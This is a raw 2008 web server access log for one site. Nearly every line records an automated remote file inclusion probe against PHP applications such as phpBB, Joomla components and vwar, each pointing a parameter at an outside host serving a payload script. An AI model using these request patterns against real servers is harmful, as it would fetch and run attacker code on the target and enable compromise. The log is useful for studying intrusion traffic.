200.11.67.242 - - [12/Sep/2008:11:08:36 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:08:37 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:11:08:37 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:11:08:37 -0700] "GET /popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:11:08:38 -0700] "GET /logs/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:08:38 -0700] "GET /logs/access_080817.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:08:40 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:08:41 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:08:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:08:44 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
12.192.82.221 - - [12/Sep/2008:11:08:44 -0700] "GET /logs/access_080302.log/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:08:45 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:08:45 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:08:47 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:08:48 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:08:48 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:08:50 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:08:51 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:08:52 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:08:57 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:08:58 -0700] "GET /logs/access_080524.log%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:08:58 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:08:59 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:11 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:11 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:12 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:14 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:14 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:15 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:11:09:15 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:11:09:25 -0700] "GET /logs/default.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:11:09:25 -0700] "GET /logs/access_080411.log/default.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.155 - - [12/Sep/2008:11:09:25 -0700] "GET /default.php?page=http://cmdrox.fileave.com/vnc/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:26 -0700] "GET /logs/access_080308.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:27 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.9 - - [12/Sep/2008:11:09:27 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.82.114 - - [12/Sep/2008:11:09:30 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.64.130 - - [12/Sep/2008:11:09:38 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:09:42 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:09:42 -0700] "GET /skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:09:43 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:09:45 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:09:46 -0700] "GET /logs/access_080806.log//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:09:46 -0700] "GET /logs/access_080806.log//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:09:46 -0700] "GET //index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 200 89069 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:09:46 -0700] "GET /logs/access_080806.log//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:09:46 -0700] "GET /logs//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:09:46 -0700] "GET //index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 200 89053 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:09:47 -0700] "GET /logs//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:09:47 -0700] "GET //index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 200 89069 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.187.99 - - [12/Sep/2008:11:09:47 -0700] "GET /logs//index.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:09:47 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:09:49 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:11:09:54 -0700] "GET /logs/access_080825.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:11:10:00 -0700] "GET /logs/access_080616.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.243.76.61 - - [12/Sep/2008:11:10:07 -0700] "GET /logs/access_080502.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:10:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:10:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:10:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:10:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:10:14 -0700] "GET /logs/access_080502.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:11:10:15 -0700] "GET /errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:11:10:15 -0700] "GET /logs/access_080723.log/errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:11:10:15 -0700] "GET /logs/errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:11:10:18 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:11:10:18 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:11:10:18 -0700] "GET /logs/access_080402.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:11:10:18 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:11:10:19 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:11:10:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:11:10:19 -0700] "GET /logs/access_080212.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:11:10:22 -0700] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:10:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:10:27 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.204.249 - - [12/Sep/2008:11:10:44 -0700] "GET /logs/access_080830.log/errors.php?error=http://tanahdijual.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
65.55.108.195 - - [12/Sep/2008:11:10:50 -0700] "GET /bikes/dteel/2008_02_15/?N=A HTTP/1.1" 200 1134 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:11:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:11:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:11:19 -0700] "GET /logs/access_080717.log//home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:11:20 -0700] "GET //home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.58 - - [12/Sep/2008:11:11:21 -0700] "GET /logs//home.php?content=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:11:29 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:11:30 -0700] "GET /modules/My_eGallery/index.php?basepath=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:11:35 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.3.137.199 - - [12/Sep/2008:11:11:35 -0700] "GET /modules/My_eGallery/index.php?basepath=http://sobi.yourfreehosting.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:11:38 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:11:39 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.811" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:11:40 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:11:45 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:11:47 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:11:47 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:11:50 -0700] "GET /logs/access_080419.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:11:51 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
82.148.160.16 - - [12/Sep/2008:11:11:51 -0700] "GET /logs/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.102.132 - - [12/Sep/2008:11:11:58 -0700] "GET /index.php?pg=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 200 89149 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.138.35.12 - - [12/Sep/2008:11:12:02 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://brojolelle.org/bnc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:11 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:13 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:14 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.65" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:12:15 -0700] "GET /logs//home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.155.50 - - [12/Sep/2008:11:12:15 -0700] "GET //home.php?content=http://indocairo.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:11:12:15 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
